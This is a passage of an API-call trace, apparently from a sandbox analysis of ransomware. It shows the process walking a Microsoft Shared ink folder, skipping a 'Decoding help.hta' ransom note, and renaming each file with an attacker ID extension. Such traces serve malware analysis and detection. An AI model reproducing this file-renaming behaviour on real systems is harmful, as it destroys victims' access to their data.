Shared\\ink\\", lpString2="micaut.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll" [0053.816] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll" [0053.816] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0053.816] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.816] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x472c5956, ftCreationTime.dwHighDateTime=0x1ca040e, ftLastAccessTime.dwLowDateTime=0xa4945a00, ftLastAccessTime.dwHighDateTime=0x1ca0424, ftLastWriteTime.dwLowDateTime=0x9fcc4285, ftLastWriteTime.dwHighDateTime=0x1ca0425, nFileSizeHigh=0x0, nFileSizeLow=0x7c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Ink.dll", cAlternateFileName="")) returned 1 [0053.816] lstrcpyW (in: lpString1=0x2a740278, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.816] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.816] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.816] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.816] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Microsoft.Ink.dll") returned -1 [0053.816] lstrlenW (lpString="Microsoft.Ink.dll") returned 17 [0053.816] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.816] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.816] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Microsoft.Ink.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Microsoft.Ink.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Microsoft.Ink.dll" [0053.816] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Microsoft.Ink.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Microsoft.Ink.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Microsoft.Ink.dll" [0053.817] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Microsoft.Ink.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Microsoft.Ink.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Microsoft.Ink.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0053.817] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Microsoft.Ink.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\microsoft.ink.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Microsoft.Ink.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\microsoft.ink.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.817] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa12394d3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa12394d3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa125f634, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x179c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mip.exe", cAlternateFileName="")) returned 1 [0053.817] lstrcpyW (in: lpString1=0x2a740278, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.817] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.817] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.817] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.817] lstrcmpiW (lpString1="Decoding help.hta", lpString2="mip.exe") returned -1 [0053.817] lstrlenW (lpString="mip.exe") returned 7 [0053.817] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.817] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.817] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="mip.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mip.exe") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mip.exe" [0053.817] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mip.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mip.exe") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mip.exe" [0053.817] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mip.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mip.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mip.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0053.817] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mip.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mip.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mip.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mip.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.817] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ad46e47, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5ad46e47, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x344e2230, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x609c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mraut.dll", cAlternateFileName="")) returned 1 [0053.817] lstrcpyW (in: lpString1=0x2a740278, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.818] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.818] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.818] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.818] lstrcmpiW (lpString1="Decoding help.hta", lpString2="mraut.dll") returned -1 [0053.818] lstrlenW (lpString="mraut.dll") returned 9 [0053.818] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.818] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.818] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="mraut.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll" [0053.818] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll" [0053.818] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0053.818] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.818] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66c00201, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x66c00201, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x34eb4c90, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xc200, dwReserved0=0x0, dwReserved1=0x0, cFileName="mshwgst.dll", cAlternateFileName="")) returned 1 [0053.818] lstrcpyW (in: lpString1=0x2a740278, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.818] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.818] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.818] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.818] lstrcmpiW (lpString1="Decoding help.hta", lpString2="mshwgst.dll") returned -1 [0053.818] lstrlenW (lpString="mshwgst.dll") returned 11 [0053.818] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.818] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.818] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="mshwgst.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwgst.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwgst.dll" [0053.818] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwgst.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwgst.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwgst.dll" [0053.819] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwgst.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwgst.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwgst.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0053.819] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwgst.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwgst.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwgst.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwgst.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.819] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x901e133e, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x901e133e, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x353c2bb0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x105a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mshwLatin.dll", cAlternateFileName="")) returned 1 [0053.819] lstrcpyW (in: lpString1=0x2a740278, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.819] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.819] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.819] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.819] lstrcmpiW (lpString1="Decoding help.hta", lpString2="mshwLatin.dll") returned -1 [0053.819] lstrlenW (lpString="mshwLatin.dll") returned 13 [0053.819] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.819] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.819] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="mshwLatin.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwLatin.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwLatin.dll" [0053.819] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwLatin.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwLatin.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwLatin.dll" [0053.819] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwLatin.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwLatin.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwLatin.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0053.819] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwLatin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwlatin.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwLatin.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwlatin.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.819] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0053.819] lstrcmpW (lpString1=".", lpString2="nb-NO") returned -1 [0053.819] lstrcmpW (lpString1="..", lpString2="nb-NO") returned -1 [0053.819] lstrcmpiW (lpString1="windows", lpString2="nb-NO") returned 1 [0053.820] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.820] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.820] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="nb-NO" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO" [0053.820] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\*.*" [0053.820] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0053.820] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10a32ba8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x484 [0053.821] CloseHandle (hObject=0x484) returned 1 [0053.821] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0053.821] lstrcmpW (lpString1=".", lpString2="nl-NL") returned -1 [0053.821] lstrcmpW (lpString1="..", lpString2="nl-NL") returned -1 [0053.821] lstrcmpiW (lpString1="windows", lpString2="nl-NL") returned 1 [0053.821] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.821] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.821] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="nl-NL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL" [0053.821] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\*.*" [0053.821] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0053.821] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x3350048, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x484 [0053.822] CloseHandle (hObject=0x484) returned 1 [0053.822] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0053.822] lstrcmpW (lpString1=".", lpString2="pl-PL") returned -1 [0053.822] lstrcmpW (lpString1="..", lpString2="pl-PL") returned -1 [0053.822] lstrcmpiW (lpString1="windows", lpString2="pl-PL") returned 1 [0053.822] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.822] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.822] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="pl-PL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL" [0053.822] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\*.*" [0053.822] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0053.822] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10cb68d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x484 [0053.823] CloseHandle (hObject=0x484) returned 1 [0053.823] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0053.823] lstrcmpW (lpString1=".", lpString2="pt-BR") returned -1 [0053.823] lstrcmpW (lpString1="..", lpString2="pt-BR") returned -1 [0053.823] lstrcmpiW (lpString1="windows", lpString2="pt-BR") returned 1 [0053.823] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.823] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.823] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="pt-BR" 